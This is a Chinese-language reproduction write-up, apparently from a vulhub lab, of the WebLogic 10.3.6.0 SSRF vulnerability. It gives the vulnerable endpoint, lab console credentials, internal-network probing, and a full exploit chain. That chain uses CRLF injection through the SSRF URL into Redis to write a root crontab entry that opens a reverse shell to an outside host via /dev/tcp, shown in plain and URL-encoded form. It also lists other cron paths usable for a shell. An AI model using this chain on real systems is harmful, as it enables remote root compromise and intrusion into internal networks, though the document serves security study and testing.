Weblogic SSRF漏洞
漏洞描述
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
漏洞危害等级
高危
影响版本
- weblogic_10.3.6.0
漏洞复现
基础环境
组件 | 版本 |
---|---|
vulhub | /vulhub/weblogic/ssrf |
weblogic | 10.3.6.0 |
- 管理控制台
http://10.9.11.12:7001/console/login/LoginForm.jsp weblogic:Oracle@123
- 漏洞点
http://10.9.11.12:7001/uddiexplorer/SearchPublicRegistries.jsp
漏洞演示
- BP抓包
- 探测到内网IP地址172.21.0.3,如果不是内网IP将会没有响应。
深度利用
- 探测内网脆弱资产
- 发现内网IP 地址
172.21.0.2
开放了6379
端口,极有可能是redis 数据库服务。
- redis数据库写入计划任务
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/10.9.11.1
1/1234 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
- url 编码10.9.11.223:666
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.11.223%2F666%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave
- 构造url
- 换行符是“\r\n”,也就是“%0D%0A”。将url编码后的字符串放在ssrf的域名后面
http://172.21.0.2:6379/muzi%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.11.223%2F666%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Amuzi
- 发送
- 反弹shell成功
- 补充
最后补充一下,可进行利用的cron有如下几个地方:
- /etc/crontab 这个是肯定的
- /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
- /var/spool/cron/root centos系统下root用户的cron文件
- /var/spool/cron/crontabs/root debian系统下root用户的cron文件